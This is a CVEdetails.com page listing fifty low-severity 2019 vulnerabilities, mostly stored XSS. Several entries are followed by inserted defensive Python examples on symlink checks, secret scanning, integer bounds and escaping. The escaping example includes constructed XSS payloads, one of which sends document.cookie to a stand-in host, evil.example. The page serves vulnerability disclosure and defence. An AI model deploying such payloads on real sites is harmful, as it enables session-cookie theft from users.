CVEdetails.com the ultimate security vulnerability data source

Security Vulnerabilities (CVSS score between 3 and 3.99)

Each entry below lists: CVE ID | CWE ID | vulnerability type(s) | publish and update dates | CVSS score | gained access level | access vector | access complexity | authentication | confidentiality / integrity / availability impact, followed by the description. The "# of Exploits" column is empty for every entry on this page and is omitted.

1. CVE-2019-1010003 | CWE-79 | XSS | published 2019-07-11, updated 2019-07-12 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
Leanote prior to version 2.6 is affected by: Cross Site Scripting (XSS).

2. CVE-2019-1003050 | CWE-79 | XSS | published 2019-04-10, updated 2019-04-12 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
The f:validateButton form control for the Jenkins UI did not properly escape job URLs in Jenkins 2.171 and earlier and Jenkins LTS 2.164.1 and earlier, resulting in a cross-site scripting (XSS) vulnerability exploitable by users with the ability to control job names.
3. CVE-2019-1003043 | CWE-255 | (no type listed) | published 2019-03-28, updated 2019-04-02 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: Partial/None/None
A missing permission check in Jenkins Slack Notification Plugin 2.19 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

4. CVE-2019-1003042 | CWE-79 | XSS | published 2019-03-28, updated 2019-06-10 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
A cross site scripting vulnerability in Jenkins Lockable Resources Plugin 2.4 and earlier allows attackers able to control resource names to inject arbitrary JavaScript in web pages rendered by the plugin.

5. CVE-2019-1003014 | CWE-79 | XSS | published 2019-02-06, updated 2019-04-26 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
A cross-site scripting vulnerability exists in Jenkins Config File Provider Plugin 3.4.1 and earlier in src/main/resources/lib/configfiles/configfiles.jelly that allows attackers with permission to define shared configuration files to execute arbitrary JavaScript when a user attempts to delete the shared configuration file.

6. CVE-2019-1003013 | CWE-79 | XSS | published 2019-02-06, updated 2019-04-26 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
A cross-site scripting vulnerability exists in Jenkins Blue Ocean Plugins 1.10.1 and earlier in blueocean-commons/src/main/java/io/jenkins/blueocean/commons/stapler/Export.java, blueocean-commons/src/main/java/io/jenkins/blueocean/commons/stapler/export/ExportConfig.java, blueocean-commons/src/main/java/io/jenkins/blueocean/commons/stapler/export/JSONDataWriter.java, blueocean-rest-impl/src/main/java/io/jenkins/blueocean/service/embedded/UserStatePreloader.java, blueocean-web/src/main/resources/io/jenkins/blueocean/PageStatePreloadDecorator/header.jelly that allows attackers with permission to edit a user's description in Jenkins to have Blue Ocean render arbitrary HTML when using it as that user.

7. CVE-2019-13341 | CWE-79 | XSS | published 2019-07-05, updated 2019-07-07 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
In MiniCMS V1.10, stored XSS was found in mc-admin/conf.php (comment box), which can be used to get a user's cookie.

8. CVE-2019-13340 | CWE-79 | XSS | published 2019-07-05, updated 2019-07-07 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
In MiniCMS V1.10, stored XSS was found in mc-admin/post-edit.php via the content box. An attacker can use it to get a user's cookie. This is different from CVE-2018-10296, CVE-2018-16233, CVE-2018-20520, and CVE-2019-13186.

9. CVE-2019-13339 | CWE-79 | XSS | published 2019-07-05, updated 2019-07-07 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
In MiniCMS V1.10, stored XSS was found in mc-admin/page-edit.php (content box), which can be used to get a user's cookie.

10. CVE-2019-13070 | CWE-79 | Exec Code, XSS | published 2019-07-09, updated 2019-07-10 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
A stored XSS vulnerability in the Agent/Center component of CyberPower PowerPanel Business Edition 3.4.0 allows a privileged attacker to embed malicious JavaScript in the SNMP trap receivers form. Upon visiting the /agent/action_recipient Event Action/Recipient page, the embedded code will be executed in the browser of the victim.

11. CVE-2019-13055 | CWE-200 | +Info | published 2019-06-29, updated 2019-07-08 | CVSS 3.3 | gained access: None | access: Local Network | complexity: Low | auth: Not required | C/I/A: Partial/None/None
Certain Logitech Unifying devices allow attackers to dump AES keys and addresses, leading to the capability of live decryption of Radio Frequency transmissions, as demonstrated by an attack against a Logitech K360 keyboard.

12. CVE-2019-13054 | CWE-74 | Bypass | published 2019-06-29, updated 2019-07-08 | CVSS 3.3 | gained access: None | access: Local Network | complexity: Low | auth: Not required | C/I/A: None/Partial/None
The Logitech R500 presentation clicker allows attackers to determine the AES key, leading to keystroke injection. On Windows, any text may be injected by using ALT+NUMPAD input to bypass the restriction on the characters A through Z.

13. CVE-2019-13053 | CWE-74 | Bypass | published 2019-06-29, updated 2019-07-08 | CVSS 3.3 | gained access: None | access: Local Network | complexity: Low | auth: Not required | C/I/A: None/Partial/None
Logitech Unifying devices allow keystroke injection, bypassing encryption. The attacker must press a "magic" key combination while sniffing cryptographic data from a Radio Frequency transmission. NOTE: this issue exists because of an incomplete fix for CVE-2016-10761.

14. CVE-2019-13052 | CWE-200 | +Info | published 2019-06-29, updated 2019-07-08 | CVSS 3.3 | gained access: None | access: Local Network | complexity: Low | auth: Not required | C/I/A: Partial/None/None
Logitech Unifying devices allow live decryption if the pairing of a keyboard to a receiver is sniffed.

15. CVE-2019-12830 | CWE-79 | XSS | published 2019-06-15, updated 2019-06-20 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
In MyBB before 1.8.21, an attacker can exploit a parsing flaw in the Private Message / Post renderer that leads to [video] BBCode persistent XSS to take over any forum account, aka a nested video MyCode issue.

16. CVE-2019-12749 | CWE-287 | Bypass | published 2019-06-11, updated 2019-06-14 | CVSS 3.6 | gained access: None | access: Local | complexity: Low | auth: Not required | C/I/A: Partial/Partial/None
dbus before 1.10.28, 1.12.x before 1.12.16, and 1.13.x before 1.13.12, as used in DBusServer in Canonical Upstart in Ubuntu 14.04 (and in some, less common, uses of dbus-daemon), allows cookie spoofing because of symlink mishandling in the reference implementation of DBUS_COOKIE_SHA1 in the libdbus library. (This only affects the DBUS_COOKIE_SHA1 authentication mechanism.) A malicious client with write access to its own home directory could manipulate a ~/.dbus-keyrings symlink to cause a DBusServer with a different uid to read and write in unintended locations. In the worst case, this could result in the DBusServer reusing a cookie that is known to the malicious client, and treating that cookie as evidence that a subsequent client connection came from an attacker-chosen uid, allowing authentication bypass.
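The entry above turns on one detail: the server trusted a path under the client's home directory without checking what that path actually was. The following is an added example, not dbus's own code, of the trust checks a DBUS_COOKIE_SHA1-style server should apply to a keyring directory before reading from it. The directory is inspected with lstat so a symlink is reported rather than followed, ownership and permissions are verified, and individual keyring files are opened with O_NOFOLLOW. The paths, the demo scenario and the file contents are constructed; O_NOFOLLOW is assumed to be available (Linux/BSD).

```python
"""Added example, not dbus's own code: the trust checks a DBUS_COOKIE_SHA1
style server should apply before reading a client's keyring directory
(~/.dbus-keyrings). A symlink there is the vector in CVE-2019-12749, so the
directory is inspected with lstat and never followed. Paths and the demo
scenario are constructed; O_NOFOLLOW is assumed available (Linux/BSD)."""
import os
import stat
import tempfile


def check_keyring_dir(path, expected_uid=None):
    """Return (ok, reason). lstat reports a symlink as a symlink instead of
    following it to wherever the attacker pointed it."""
    if expected_uid is None:
        expected_uid = os.getuid()
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return False, "missing"
    if stat.S_ISLNK(st.st_mode):
        return False, "symlink"
    if not stat.S_ISDIR(st.st_mode):
        return False, "not a directory"
    if st.st_uid != expected_uid:
        return False, "wrong owner"
    if st.st_mode & 0o077:
        return False, "group/other access"
    return True, "ok"


def open_keyring_file(dirpath, name):
    """Open one keyring file, refusing a symlink at the final component."""
    flags = os.O_RDONLY | getattr(os, "O_NOFOLLOW", 0)
    return os.open(os.path.join(dirpath, name), flags)


def demo():
    """Build the scenarios in a temporary directory; return every check's result."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        good = os.path.join(tmp, "good-keyrings")
        os.mkdir(good)
        os.chmod(good, 0o700)  # explicit chmod: mkdir's mode is masked by umask
        results["good"] = check_keyring_dir(good)
        results["other_uid"] = check_keyring_dir(good, expected_uid=os.getuid() + 1)

        loose = os.path.join(tmp, "loose-keyrings")
        os.mkdir(loose)
        os.chmod(loose, 0o755)
        results["loose"] = check_keyring_dir(loose)

        # Attacker replaces the directory with a symlink to a location they control.
        target = os.path.join(tmp, "attacker-target")
        os.mkdir(target)
        os.chmod(target, 0o700)
        link = os.path.join(tmp, "symlinked-keyrings")
        os.symlink(target, link)
        results["symlink"] = check_keyring_dir(link)

        # Same trick one level down: a keyring *file* that is really a symlink.
        with open(os.path.join(target, "planted"), "w") as f:
            f.write("placeholder\n")  # constructed content, not the real keyring format
        os.symlink(os.path.join(target, "planted"),
                   os.path.join(good, "org_freedesktop_general"))
        try:
            os.close(open_keyring_file(good, "org_freedesktop_general"))
            results["nofollow_blocks"] = False
        except OSError:
            results["nofollow_blocks"] = True
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:16} {outcome}")
```

The directory check and the O_NOFOLLOW open are complementary: the first rejects a swapped directory, the second rejects a swapped file inside an otherwise sound directory. Neither helps if the server runs the check and then reopens by path later, so keep the file descriptor from the checked open rather than re-resolving the path.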
17. CVE-2019-12745 | CWE-79 | XSS | published 2019-06-20, updated 2019-06-24 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
out/out.UsrMgr.php in SeedDMS before 5.1.11 allows Stored Cross-Site Scripting (XSS) via the name field.

18. CVE-2019-12566 | CWE-79 | XSS | published 2019-06-02, updated 2019-06-03 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
The WP Statistics plugin through 12.6.5 for Wordpress has stored XSS in includes/class-wp-statistics-pages.php. This is related to an account with the Editor role creating a post with a title that contains JavaScript, to attack an admin user.

19. CVE-2019-12500 | CWE-285 | (no type listed) | published 2019-05-31, updated 2019-05-31 | CVSS 3.3 | gained access: None | access: Local Network | complexity: Low | auth: Not required | C/I/A: None/Partial/None
The Xiaomi M365 scooter 2019-02-12 before 1.5.1 allows spoofing of "suddenly accelerate" commands. This occurs because Bluetooth Low Energy commands have no server-side authentication check. Other affected commands include suddenly braking, locking, and unlocking.

20. CVE-2019-12452 | CWE-255 | (no type listed) | published 2019-05-29, updated 2019-05-30 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: Partial/None/None
types/types.go in Containous Traefik 1.7.x through 1.7.11, when the --api flag is used and the API is publicly reachable and exposed without sufficient access control (which is contrary to the API documentation), allows remote authenticated users to discover password hashes by reading the Basic HTTP Authentication or Digest HTTP Authentication section, or discover a key by reading the ClientTLS section. These can be found in the JSON response to a /api request.
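A practical check for the Traefik entry above is to save the /api response from your own instance and scan it for the material the description says is exposed. The following is an added example, not Traefik code: it walks a JSON document and reports any "user:hash" list under a basicAuth or users key and any key field inside a ClientTLS block, printing a redacted preview rather than the secret itself. The response shape (providers -> frontends -> basicAuth / auth.basic.users / auth.digest.users, and a clientTLS block with a "key") is assumed from the description, so adjust the key names to match your dump; the sample response is constructed, not a real capture.

```python
"""Added example, not Traefik code: scan a saved copy of a Traefik 1.7 /api
response for the material CVE-2019-12452 says leaks (Basic/Digest user:hash
lists and ClientTLS key material). The JSON shape is assumed from the
description; the sample response is constructed, not a real capture."""
import json

SAMPLE_API_RESPONSE = json.dumps({
    "file": {
        "frontends": {
            "frontend-admin": {
                "basicAuth": ["admin:$apr1$saltsalt$hashhashhashhash"],
                "auth": {"basic": {"users": ["ops:$2y$05$dummybcrypthashvalue"]}},
            },
            "frontend-public": {"auth": {"digest": {"users": []}}},
        },
        "backends": {"backend-1": {"servers": {"s1": {"url": "http://10.0.0.5:8080"}}}},
    },
    "consul": {
        "clientTLS": {
            "ca": "/etc/traefik/ca.pem",
            "cert": "/etc/traefik/client.pem",
            "key": "-----BEGIN PRIVATE KEY-----\nMIIE...\n-----END PRIVATE KEY-----",
        }
    },
})

USER_HASH_LIST_KEYS = {"basicauth", "users"}   # lists of "user:hash" strings (assumed names)
TLS_CONTAINER_KEYS = {"clienttls", "tls"}      # blocks whose "key" field is private-key material


def find_leaked_secrets(doc, path="$", in_tls=False):
    """Walk the JSON tree; return (json_path, kind, redacted_preview) tuples."""
    hits = []
    if isinstance(doc, dict):
        for key, value in doc.items():
            child = f"{path}.{key}"
            lk = key.lower()
            if lk in USER_HASH_LIST_KEYS and isinstance(value, list):
                for i, entry in enumerate(value):
                    if isinstance(entry, str) and ":" in entry:
                        user, _, digest = entry.partition(":")
                        # Keep only the hash prefix (algorithm marker) in the report.
                        hits.append((f"{child}[{i}]", "password-hash", f"{user}:{digest[:6]}..."))
            elif in_tls and lk == "key" and isinstance(value, str) and value:
                kind = "private-key" if "PRIVATE KEY" in value else "key-path"
                hits.append((child, kind, value.splitlines()[0]))
            else:
                hits.extend(find_leaked_secrets(value, child, in_tls or lk in TLS_CONTAINER_KEYS))
    elif isinstance(doc, list):
        for i, item in enumerate(doc):
            hits.extend(find_leaked_secrets(item, f"{path}[{i}]", in_tls))
    return hits


def scan_response(text):
    """Parse a saved /api body and return the findings."""
    return find_leaked_secrets(json.loads(text))


if __name__ == "__main__":
    for json_path, kind, preview in scan_response(SAMPLE_API_RESPONSE):
        print(f"{kind:13} {json_path}  {preview}")
```

Any hit means the API should not be reachable by the users who can reach it today: put the dashboard behind its own authentication or off the public entrypoint, and rotate the exposed hashes and keys, since an htpasswd hash that has been read can be cracked offline.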
21. CVE-2019-12376 | CWE-798 | (no type listed) | published 2019-06-03, updated 2019-06-04 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: Partial/None/None
Use of a hard-coded encryption key in Ivanti LANDESK Management Suite (LDMS, aka Endpoint Manager) 10.0.1.168 Service Update 5 may lead to full managed endpoint compromise by an authenticated user with read privileges.

22. CVE-2019-12195 | CWE-79 | XSS | published 2019-05-24, updated 2019-05-29 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
TP-Link TL-WR840N v5 00000005 devices allow XSS via the network name. The attacker must first log into the router's admin page, for example after recovering the password with THC-HYDRA, and then set the network name to an XSS payload. Once the payload is saved, the network name is changed and the internet connection drops, so all users become disconnected from the internet.

23. CVE-2019-12190 | CWE-79 | XSS | published 2019-05-21, updated 2019-05-21 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
XSS was discovered in CentOS-WebPanel.com (aka CWP) CentOS Web Panel through 0.9.8.747 via the testacc/fileManager2.php fm_current_dir or filename parameter.

24. CVE-2019-12184 | CWE-79 | XSS | published 2019-05-19, updated 2019-05-20 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
There is XSS in browser/components/MarkdownPreview.js in BoostIO Boostnote 0.11.15 via a label named flowchart, sequence, gallery, or chart, as demonstrated by a crafted SRC attribute of an IFRAME element, a different vulnerability than CVE-2019-12136.

25. CVE-2019-12136 | CWE-79 | XSS | published 2019-05-15, updated 2019-05-16 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
There is XSS in BoostIO Boostnote 0.11.15 via a label named mermaid, as demonstrated by a crafted SRC attribute of an IFRAME element.

26. CVE-2019-11878 | CWE-190 | Overflow | published 2019-05-10, updated 2019-05-13 | CVSS 3.3 | gained access: None | access: Local Network | complexity: Low | auth: Not required | C/I/A: None/None/Partial
An issue was discovered on XiongMai Besder IP20H1 V4.02.R12.00035520.12012.047500.00200 cameras. An attacker on the same local network as the camera can craft a message with a size field larger than 0x80000000 and send it to the camera, related to an integer overflow or use of a negative number. This then crashes the camera for about 120 seconds.
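The "larger than 0x80000000" threshold in the entry above is the signature of a length field being read as a signed 32-bit integer: every value with the top bit set becomes negative, passes any "size <= limit" check, and then turns back into a huge unsigned length when it reaches the copy or allocation. The following added example, not XiongMai code, models that in Python with the struct module (Python integers do not overflow on their own, so the 32-bit decode is made explicit) and shows the unsigned bounds check that closes the hole. The 4-byte little-endian header layout and the 1 MiB buffer limit are assumed for illustration.

```python
"""Added example, not XiongMai code: why a size field of 0x80000000 or larger
defeats a signed comparison (CVE-2019-11878 pattern) and the unsigned check
that replaces it. The 4-byte little-endian size field and the 1 MiB receive
buffer are assumptions made for illustration."""
import struct

MAX_MESSAGE = 0x100000  # hypothetical receive-buffer size, 1 MiB


def vulnerable_accepts(header):
    """Decodes the size as a 32-bit signed int. 0x80000000 becomes
    -2147483648, which passes `size <= MAX_MESSAGE`; the negative value then
    reaches the copy/allocation code, where it is treated as a huge size_t."""
    (size,) = struct.unpack("<i", header[:4])
    return size <= MAX_MESSAGE


def hardened_accepts(header):
    """Decodes the size as unsigned and rejects zero and anything over the buffer."""
    (size,) = struct.unpack("<I", header[:4])
    return 0 < size <= MAX_MESSAGE


def as_size_t(size):
    """The value a negative signed length becomes when handed to a size_t
    parameter such as memcpy's or malloc's on a 32-bit build."""
    return size & 0xFFFFFFFF


def classify(size_value):
    """Run both checks on a header carrying the given size field."""
    header = struct.pack("<I", size_value) + b"\x00" * 4  # constructed header
    return {"vulnerable": vulnerable_accepts(header), "hardened": hardened_accepts(header)}


if __name__ == "__main__":
    for value in (0x10, 0x200000, 0x80000000, 0xFFFFFFFF):
        print(f"size=0x{value:08x} -> {classify(value)}")
```

In C the same fix is to declare the field as uint32_t (or read it into one) and compare against the buffer size before it is ever used as a length; a signed int compared to a signed limit is the bug, not the size of the buffer.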
27. CVE-2019-11871 | CWE-79 | XSS | published 2019-05-09, updated 2019-06-17 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
The Custom Field Suite plugin before 2.5.15 for WordPress has XSS for editors or admins.

28. CVE-2019-11828 | CWE-79 | XSS | published 2019-06-30, updated 2019-07-01 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
Cross-site scripting (XSS) vulnerability in Chart in Synology Office before 3.1.4-2771 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.

29. CVE-2019-11827 | CWE-79 | XSS | published 2019-06-30, updated 2019-07-01 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
Cross-site scripting (XSS) vulnerability in SYNO.NoteStation.Shard in Synology Note Station before 2.5.3-0863 allows remote attackers to inject arbitrary web script or HTML via the object_id parameter.

30. CVE-2019-11825 | CWE-79 | XSS | published 2019-06-30, updated 2019-07-01 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
Cross-site scripting (XSS) vulnerability in Event Editor in Synology Calendar before 2.3.0-0615 allows remote attackers to inject arbitrary web script or HTML via the title parameter.

31. CVE-2019-11649 | CWE-79 | Exec Code, XSS | published 2019-06-19, updated 2019-06-24 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
A cross-site scripting vulnerability has been identified in Micro Focus Fortify Software Security Center Server, versions 17.2, 18.1 and 18.2. The vulnerability could be exploited to execute JavaScript code in a user's browser.

32. CVE-2019-11513 | CWE-79 | XSS | published 2019-04-24, updated 2019-04-26 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
The File Manager in CMS Made Simple through 2.2.10 has Reflected XSS via the "New name" field in a Rename action.

33. CVE-2019-11504 | CWE-79 | XSS | published 2019-04-24, updated 2019-05-06 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
Zotonic before version 0.47 has mod_admin XSS.

34. CVE-2019-11429 | CWE-79 | XSS | published 2019-05-13, updated 2019-05-15 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.793 (Free/Open Source Version), 0.9.8.753 (Pro) and 0.9.8.807 (Pro) is vulnerable to Reflected XSS for the "Domain" field on the "DNS Functions" > "Add DNS Zone" screen.

35. CVE-2019-11370 | CWE-79 | XSS | published 2019-06-03, updated 2019-06-04 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
Stored XSS was discovered in Carel pCOWeb prior to B1.2.4, as demonstrated by the config/pw_snmp.html "System contact" field.

36. CVE-2019-11368 | CWE-79 | XSS | published 2019-06-03, updated 2019-06-05 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
Stored XSS was discovered in AUO Solar Data Recorder before 1.3.0 via the protect/config.htm addr parameter.

37. CVE-2019-11226 | CWE-79 | XSS | published 2019-06-05, updated 2019-06-05 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
CMS Made Simple 2.2.10 has XSS via the m1_name parameter in "Add Article" under Content -> Content Manager -> News.

38. CVE-2019-11092 | CWE-254 | (no type listed) | published 2019-06-13, updated 2019-06-14 | CVSS 3.6 | gained access: None | access: Local | complexity: Low | auth: Not required | C/I/A: Partial/Partial/None
Insufficient password protection in the attestation database for Open CIT may allow an authenticated user to potentially enable information disclosure via local access.

39. CVE-2019-11025 | CWE-79 | XSS | published 2019-04-08, updated 2019-04-16 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
In clearFilter() in utilities.php in Cacti before 1.2.3, no escaping occurs before printing out the value of the SNMP community string (SNMP Options) in the View poller cache, leading to XSS.
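Most of the stored-XSS entries on this page share one root cause: an identifier that a low-privileged user controls (a Jenkins job or resource name in entries 2 and 4, a Boostnote label's iframe src in entries 24 and 25, the Cacti SNMP community string here) is written into a page without escaping for the context it lands in. The following is an added example, not code from Jenkins, Cacti or any other project listed: it renders two constructed attacker-controlled values with raw interpolation, then with escaping chosen per context (URL path segment, HTML attribute and text, and an inline JavaScript literal). The sample payloads are constructed for the demonstration.

```python
"""Added example for the stored-XSS entries above (Jenkins job names, Boostnote
iframe src, Cacti SNMP community strings). Not code from any of those projects:
it shows the unescaped interpolation behind the bug and the context-aware
escaping that removes it. The sample values are constructed."""
import html
import json
from urllib.parse import quote

# Constructed attacker-controlled identifiers, not taken from a real report.
JOB_NAME = 'build"><img src=x onerror=alert(document.cookie)>'
COMMUNITY = "public</td><script>fetch('//evil.example/?c='+document.cookie)</script>"


def render_vulnerable(job_name, community):
    """Raw interpolation into an href attribute and into table-cell text."""
    return (f'<a href="/job/{job_name}/">{job_name}</a>'
            f'<td>{community}</td>')


def render_hardened(job_name, community):
    """Escape per context: percent-encode the URL path segment, entity-encode
    the attribute/text content. html.escape(quote=True) also encodes ' and "."""
    return (f'<a href="/job/{quote(job_name, safe="")}/">'
            f'{html.escape(job_name, quote=True)}</a>'
            f'<td>{html.escape(community, quote=True)}</td>')


def to_js_literal(value):
    """Embed a string inside an inline <script>: JSON-encode it, then break the
    '</' sequence so the payload cannot close the script element early."""
    return json.dumps(value).replace("</", "<\\/")


def js_roundtrip_ok(value):
    """The escaped literal still decodes to the original string."""
    return json.loads(to_js_literal(value)) == value


if __name__ == "__main__":
    print(render_vulnerable(JOB_NAME, COMMUNITY))
    print(render_hardened(JOB_NAME, COMMUNITY))
    print(to_js_literal(COMMUNITY))
```

The point to take from the three escaping functions is that there is no single "sanitize" step: the same job name needs percent-encoding in the URL, entity-encoding in the link text, and JSON encoding if it is ever handed to a script block. Template engines that escape by default (Jelly's output escaping, Twig, Jinja2 autoescape) do the text and attribute cases for you; URL and script contexts still have to be handled deliberately.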
40. CVE-2019-11017 | CWE-79 | XSS | published 2019-04-18, updated 2019-04-19 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
On D-Link DI-524 V2.06RU devices, multiple Stored and Reflected XSS vulnerabilities were found in the Web Configuration: /spap.htm, /smap.htm, and /cgi-bin/smap, as demonstrated by the cgi-bin/smap RC parameter.

41. CVE-2019-10975 | CWE-125 | (no type listed) | published 2019-07-02, updated 2019-07-05 | CVSS 3.3 | gained access: None | access: Local | complexity: Medium | auth: Not required | C/I/A: Partial/None/Partial
An out-of-bounds read vulnerability has been identified in Fuji Electric Alpha7 PC Loader Versions 1.1 and prior, which may crash the system.

42. CVE-2019-10909 | CWE-79 | XSS | published 2019-05-16, updated 2019-05-20 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
In Symfony before 2.7.51, 2.8.x before 2.8.50, 3.x before 3.4.26, 4.x before 4.1.12, and 4.2.x before 4.2.7, validation messages are not escaped, which can lead to XSS when user input is included. This is related to symfony/framework-bundle.

43. CVE-2019-10893 | CWE-79 | XSS | published 2019-04-18, updated 2019-05-02 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.793 (Free/Open Source Version) and 0.9.8.753 (Pro) is vulnerable to Stored/Persistent XSS for Admin Email fields on the "CWP Settings" > "Edit Settings" screen. By changing the email ID to any XSS Payload and clicking on Save Changes, the XSS Payload will execute.

44. CVE-2019-10689 | CWE-287 | +Info | published 2019-06-24, updated 2019-06-27 | CVSS 3.3 | gained access: None | access: Local Network | complexity: Low | auth: Not required | C/I/A: Partial/None/None
VVX products using UCS software version 5.9.2 and earlier with Better Together over Ethernet Connector (BToE) application version 3.9.1 and earlier provide insufficient authentication between the BToE application and the BToE component, resulting in leakage of sensitive information.

45. CVE-2019-10634 | CWE-79 | XSS | published 2019-04-09, updated 2019-04-09 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
An XSS vulnerability in the Zyxel NAS 326 version 5.21 and below allows a remote authenticated attacker to inject arbitrary JavaScript or HTML via the user, group, and file-share description fields.

46. CVE-2019-10349 | CWE-79 | XSS | published 2019-07-11, updated 2019-07-15 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
A stored cross site scripting vulnerability in Jenkins Dependency Graph Viewer Plugin 0.13 and earlier allowed attackers able to configure jobs in Jenkins to inject arbitrary HTML and JavaScript in the plugin-provided web pages in Jenkins.

47. CVE-2019-10335 | CWE-79 | XSS | published 2019-06-11, updated 2019-06-13 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
A stored cross site scripting vulnerability in Jenkins ElectricFlow Plugin 1.1.5 and earlier allowed attackers able to configure jobs in Jenkins or control the output of the ElectricFlow API to inject arbitrary HTML and JavaScript in the plugin-provided output on build status pages.

48. CVE-2019-10325 | CWE-79 | XSS | published 2019-05-31, updated 2019-06-03 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
A cross-site scripting vulnerability in Jenkins Warnings NG Plugin 5.0.0 and earlier allowed attackers with Job/Configure permission to inject arbitrary JavaScript in build overview pages.

49. CVE-2019-10300 | CWE-352 | CSRF | published 2019-04-18, updated 2019-05-06 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: Partial/None/None
A cross-site request forgery vulnerability in Jenkins GitLab Plugin 1.5.11 and earlier in the GitLabConnectionConfig#doTestConnection form validation method allowed attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

50. CVE-2019-10261 | CWE-79 | XSS | published 2019-04-03, updated 2019-05-06 | CVSS 3.5 | gained access: None | access: Remote | complexity: Medium | auth: Single system | C/I/A: None/Partial/None
CentOS Web Panel (CWP) 0.9.8.789 is vulnerable to Stored/Persistent XSS for the "Name Server 1" and "Name Server 2" fields via a "DNS Functions" "Edit Nameservers IPs" action.
Total number of vulnerabilities: 4150 (page 1 of 83).
CVE is a registered trademark of the MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. CWE is a registered trademark of the MITRE Corporation and the authoritative source of CWE content is MITRE's CWE web site. OVAL is a registered trademark of The MITRE Corporation and the authoritative source of OVAL content is MITRE's OVAL web site.
Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.